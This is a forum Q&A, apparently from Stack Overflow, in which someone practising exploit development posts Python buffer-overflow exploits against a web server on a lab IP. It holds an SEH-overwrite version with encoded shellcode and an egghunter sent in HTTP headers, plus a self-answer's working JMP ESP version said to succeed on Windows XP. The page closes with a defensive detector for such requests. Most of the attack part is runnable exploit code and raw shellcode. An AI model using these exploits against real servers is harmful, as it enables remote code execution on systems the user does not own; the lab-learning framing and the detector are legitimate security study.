Need help with a Structured Exception Handling (SEH) bypass + egghunter


I am practising exploit development and trying to reproduce this exploit in the same environment: exploit link

I am facing a problem where the egghunter is not executing. I even tried the one from the vulnerability and it did not work. I also ran the exploit and it did not work properly. I tried using the egghunter generated by the egghunter.rb tool in Metasploit, encoded with different encoders, and it did not work well; then I tried another egghunter generated with the mona.py command in Immunity Debugger and it did not work either. Here is the code:

import socket

# Python 2: str literals are byte strings, so the "\x.." escapes below are raw bytes.
ip='192.168.163.130'
port=80
#!mona seh
#6FC5447E   5E               POP POP RETN address
seh="\x7e\x44\xc5\x6f"
nseh="\xeb\xE0\x90\x90"
# short jmp backwards (0xEB, rel8 0xE0) toward the egghunter placed right before nSEH
#Attempting to encode payload with 1 iterations of x86/alpha_mixed
#x86/alpha_mixed succeeded with size 727 (iteration=0)
#x86/alpha_mixed chosen with final size 727
#Payload size: 727 bytes
shellcode=("\x89\xe2\xdb\xd4\xd9\x72\xf4\x59\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41"
"\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42"
"\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59"
"\x6c\x7a\x48\x4f\x72\x53\x30\x53\x30\x73\x30\x73\x50\x6d\x59"
"\x39\x75\x70\x31\x59\x50\x61\x74\x4c\x4b\x52\x70\x74\x70\x6c"
"\x4b\x61\x42\x74\x4c\x6e\x6b\x33\x62\x65\x44\x6c\x4b\x74\x32"
"\x71\x38\x74\x4f\x4c\x77\x30\x4a\x75\x76\x56\x51\x49\x6f\x6e"
"\x4c\x75\x6c\x30\x61\x33\x4c\x35\x52\x46\x4c\x77\x50\x79\x51"
"\x68\x4f\x56\x6d\x67\x71\x58\x47\x59\x72\x7a\x52\x36\x32\x53"
"\x67\x4c\x4b\x73\x62\x36\x70\x6c\x4b\x61\x5a\x67\x4c\x4c\x4b"
"\x52\x6c\x47\x61\x44\x38\x78\x63\x32\x68\x36\x61\x6e\x31\x46"
"\x31\x4e\x6b\x72\x79\x51\x30\x73\x31\x48\x53\x4e\x6b\x71\x59"
"\x45\x48\x4b\x53\x35\x6a\x70\x49\x6e\x6b\x36\x54\x6c\x4b\x67"
"\x71\x4e\x36\x45\x61\x59\x6f\x6e\x4c\x4a\x61\x6a\x6f\x66\x6d"
"\x53\x31\x39\x57\x76\x58\x49\x70\x50\x75\x5a\x56\x44\x43\x71"
"\x6d\x4b\x48\x65\x6b\x53\x4d\x34\x64\x61\x65\x6a\x44\x46\x38"
"\x4e\x6b\x73\x68\x67\x54\x33\x31\x58\x53\x73\x56\x6c\x4b\x66"
"\x6c\x70\x4b\x6e\x6b\x31\x48\x65\x4c\x46\x61\x6a\x73\x6e\x6b"
"\x57\x74\x6c\x4b\x75\x51\x68\x50\x6f\x79\x50\x44\x51\x34\x77"
"\x54\x73\x6b\x61\x4b\x43\x51\x52\x79\x73\x6a\x56\x31\x6b\x4f"
"\x6b\x50\x51\x4f\x61\x4f\x62\x7a\x4c\x4b\x64\x52\x68\x6b\x6c"
"\x4d\x63\x6d\x72\x48\x77\x43\x64\x72\x57\x70\x33\x30\x71\x78"
"\x50\x77\x53\x43\x44\x72\x53\x6f\x56\x34\x61\x78\x50\x4c\x64"
"\x37\x77\x56\x53\x37\x6b\x4f\x79\x45\x6d\x68\x6e\x70\x56\x61"
"\x33\x30\x33\x30\x75\x79\x69\x54\x63\x64\x76\x30\x65\x38\x64"
"\x69\x6b\x30\x52\x4b\x47\x70\x59\x6f\x4e\x35\x51\x7a\x76\x65"
"\x73\x58\x4f\x30\x79\x38\x6f\x53\x6b\x33\x73\x58\x55\x52\x77"
"\x70\x64\x51\x63\x6c\x4e\x69\x4b\x56\x32\x70\x72\x70\x30\x50"
"\x66\x30\x77\x30\x72\x70\x67\x30\x50\x50\x52\x48\x39\x7a\x56"
"\x6f\x49\x4f\x6b\x50\x69\x6f\x6a\x75\x4e\x77\x63\x5a\x36\x70"
"\x32\x76\x63\x67\x62\x48\x7a\x39\x6c\x65\x30\x74\x31\x71\x6b"
"\x4f\x4e\x35\x4b\x35\x49\x50\x52\x54\x65\x5a\x59\x6f\x30\x4e"
"\x67\x78\x43\x45\x5a\x4c\x6b\x58\x43\x51\x35\x50\x73\x30\x47"
"\x70\x62\x4a\x65\x50\x61\x7a\x37\x74\x76\x36\x32\x77\x55\x38"
"\x65\x52\x39\x49\x59\x58\x71\x4f\x69\x6f\x78\x55\x4b\x33\x4c"
"\x38\x43\x30\x63\x4e\x34\x76\x6c\x4b\x34\x76\x30\x6a\x53\x70"
"\x72\x48\x77\x70\x64\x50\x57\x70\x63\x30\x31\x46\x51\x7a\x75"
"\x50\x70\x68\x30\x58\x6f\x54\x72\x73\x5a\x45\x79\x6f\x6a\x75"
"\x4d\x43\x51\x43\x33\x5a\x43\x30\x71\x46\x33\x63\x36\x37\x31"
"\x78\x46\x62\x78\x59\x5a\x68\x33\x6f\x39\x6f\x68\x55\x4f\x73"
"\x58\x78\x47\x70\x73\x4d\x55\x72\x33\x68\x53\x58\x63\x30\x37"
"\x30\x73\x30\x65\x50\x51\x7a\x33\x30\x32\x70\x73\x58\x44\x4b"
"\x36\x4f\x34\x4f\x56\x50\x59\x6f\x7a\x75\x33\x67\x52\x48\x33"
"\x45\x50\x6e\x70\x4d\x75\x31\x59\x6f\x6a\x75\x53\x6e\x63\x6e"
"\x39\x6f\x34\x4c\x57\x54\x49\x79\x51\x61\x79\x6f\x4b\x4f\x49"
"\x6f\x65\x51\x59\x53\x67\x59\x78\x46\x74\x35\x4f\x37\x48\x43"
"\x4f\x4b\x6c\x30\x6e\x55\x4e\x42\x56\x36\x50\x6a\x53\x30\x42"
"\x73\x4b\x4f\x79\x45\x41\x41")
# 32-byte egghunter that scans memory for the doubled tag (w00tw00t) preceding the shellcode
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
# buffer layout: junk, egghunter, nSEH (short jmp), SEH (POP POP RETN), filler
payload="A"*2248+egghunter+nseh+seh+"D"*(5005-2280-4-4-62)
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close()

And here are the debugger images:

Note: since Stack Overflow does not let me post more than two links, I will put the rest of the image links at the end.

As you can see, everything in the exploit is running fine, but once the egghunter starts running an error occurs. I edited my code and recalculated the payload with another one generated by mona this time, and unfortunately it did not work. So can anyone please help me find out what the problem is?

For my part, I think the problem is the access violation and that the egghunter cannot read memory. Is it possible to fix this problem, please?

asked by HAlmusajjen 28.01.2017 - 20:05

1 answer


I found the solution. First of all, the correct environment is not Windows 7, it is Windows XP. I don't know why the egghunter does not work on Windows 7, but I have tested the following exploit and it works perfectly on Windows XP.

import socket

# Python 2: str literals are byte strings, so the "\x.." escapes below are raw bytes.
ip='192.168.163.128'
port=80

#Payload size: 360 bytes
#bad characters "\x00\x0a\x0d\x0e\xfe\x5c"
shellcode=(
"\xdb\xc9\xba\xbf\x25\xd3\xec\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x54\x83\xc6\x04\x31\x56\x14\x03\x56\xab\xc7\x26\x10\x3b\x85"
"\xc9\xe9\xbb\xea\x40\x0c\x8a\x2a\x36\x44\xbc\x9a\x3c\x08\x30"
"\x50\x10\xb9\xc3\x14\xbd\xce\x64\x92\x9b\xe1\x75\x8f\xd8\x60"
"\xf5\xd2\x0c\x43\xc4\x1c\x41\x82\x01\x40\xa8\xd6\xda\x0e\x1f"
"\xc7\x6f\x5a\x9c\x6c\x23\x4a\xa4\x91\xf3\x6d\x85\x07\x88\x37"
"\x05\xa9\x5d\x4c\x0c\xb1\x82\x69\xc6\x4a\x70\x05\xd9\x9a\x49"
"\xe6\x76\xe3\x66\x15\x86\x23\x40\xc6\xfd\x5d\xb3\x7b\x06\x9a"
"\xce\xa7\x83\x39\x68\x23\x33\xe6\x89\xe0\xa2\x6d\x85\x4d\xa0"
"\x2a\x89\x50\x65\x41\xb5\xd9\x88\x86\x3c\x99\xae\x02\x65\x79"
"\xce\x13\xc3\x2c\xef\x44\xac\x91\x55\x0e\x40\xc5\xe7\x4d\x0c"
"\x2a\xca\x6d\xcc\x24\x5d\x1d\xfe\xeb\xf5\x89\xb2\x64\xd0\x4e"
"\xb5\x5e\xa4\xc1\x48\x61\xd5\xc8\x8e\x35\x85\x62\x27\x36\x4e"
"\x73\xc8\xe3\xfb\x76\x5e\xcc\x54\xdb\x1d\xa4\xa6\x1c\x30\x69"
"\x2e\xfa\x62\xc1\x60\x53\xc2\xb1\xc0\x03\xaa\xdb\xce\x7c\xca"
"\xe3\x04\x15\x60\x0c\xf1\x4d\x1c\xb5\x58\x05\xbd\x3a\x77\x63"
"\xfd\xb1\x72\x93\xb3\x31\xf6\x87\xa3\x23\xf8\x57\x33\xce\xf8"
"\x3d\x37\x58\xae\xa9\x35\xbd\x98\x75\xc6\xe8\x9a\x72\x38\x6d"
"\xab\x09\x0e\xfb\x93\x65\x6e\xeb\x13\x76\x38\x61\x14\x1e\x9c"
"\xd1\x47\x3b\xe3\xcf\xfb\x90\x71\xf0\xad\x45\xd2\x98\x53\xb3"
"\x14\x07\xab\x96\x27\x40\x53\x64\x05\xe9\x3c\x96\x09\x09\xbd"
"\xfc\x89\x59\xd5\x0b\xa6\x56\x15\xf3\x6d\x3f\x3d\x7e\xe3\x8d"
"\xdc\x7f\x2e\x53\x41\x7f\xdc\x48\x94\x0e\x23\x6f\x99\xf0\x18"
"\xb9\xa0\x86\x59\x79\x97\x99\xd0\xdc\xbe\x33\x1a\x72\xc0\x11"
)
#size 32; scans memory for the doubled tag (w00tw00t) preceding the shellcode
egghunter=(
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"
"\xef\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
)
#78196D4D   FFE4             JMP ESP
jmpESP="\x4d\x6d\x19\x78"
# buffer layout: junk, return address (JMP ESP), egghunter intended to land at ESP, filler
payload="A"*2048+jmpESP+egghunter+"D"*(2100-4-2048)

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
request=("GET / HTTP/1.1\r\n"
"User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n"
"Accept-Language: "+"w00tw00t"+shellcode+"\r\n"
"Accept-Encoding: deflate, gzip\r\n"
"cookie: frmUserName=test; frmUserPass=pass; rememberPass=202%2C197%2C208%2C215%2C201; UserID=ID; PassWD=PassWD\r\n"
"Connection: "+payload+"\r\n\r\n")
s.send(request)
s.recv(1024)
s.close()

But now I don't know how to run the same exploit on Windows 7. Any help, please?

answered by HAlmusajjen 29.01.2017 - 20:48
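As an added defensive example, not code from the question or the answer: a small Python 3 check that flags HTTP requests shaped like the two exploits above, by inspecting each header for the tag-independent prefix of the 32-byte egghunter stub both posts use, the `w00tw00t` egg tag, non-printable bytes, and an oversized value. The sample requests and the 1024-byte size threshold are constructed assumptions.

```python
import re

# Tag-independent prefix of the 32-byte egghunter stub used in both posts above
# (the bytes before the "w00t" tag it searches for).
EGGHUNTER_PREFIX = (b"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58"
                    b"\xcd\x2e\x3c\x05\x5a\x74\xef\xb8")
EGG_TAG = b"w00tw00t"          # the doubled tag that marks the real shellcode
MAX_HEADER_LEN = 1024          # hypothetical per-header size threshold (assumption)

def parse_headers(raw):
    """Split a raw HTTP request (bytes) into lowercase (name, value) pairs."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers = []
    for line in head.split(b"\r\n")[1:]:       # skip the request line
        if b":" in line:
            name, value = line.split(b":", 1)
            headers.append((name.strip().lower(), value.strip()))
    return headers

def suspicious_headers(raw):
    """Return (header name, reason) findings for one raw request."""
    findings = []
    for name, value in parse_headers(raw):
        if len(value) > MAX_HEADER_LEN:
            findings.append((name, "oversized header (%d bytes)" % len(value)))
        if EGGHUNTER_PREFIX in value:
            findings.append((name, "egghunter stub bytes"))
        if EGG_TAG in value:
            findings.append((name, "egg tag"))
        if re.search(rb"[^\x09\x20-\x7e]", value):
            findings.append((name, "non-printable bytes"))
    return findings

def is_suspicious(raw):
    return bool(suspicious_headers(raw))

# Constructed samples (not captured traffic): the first mirrors the layout of the
# question's request (tag + shellcode-like bytes in Accept-Language, padding and the
# egghunter in Connection), the second is an ordinary request.
SAMPLE_ATTACK = (b"GET / HTTP/1.1\r\n"
                 b"Accept-Language: " + EGG_TAG + b"\x89\xe2\xdb\xd4AAAA\r\n"
                 b"Connection: " + b"A" * 2248 + EGGHUNTER_PREFIX + b"\xeb\xe0\x90\x90\r\n\r\n")
SAMPLE_BENIGN = (b"GET / HTTP/1.1\r\nHost: example.test\r\n"
                 b"Accept-Language: en-US\r\nConnection: keep-alive\r\n\r\n")

if __name__ == "__main__":
    for label, req in (("attack", SAMPLE_ATTACK), ("benign", SAMPLE_BENIGN)):
        print(label, suspicious_headers(req))
```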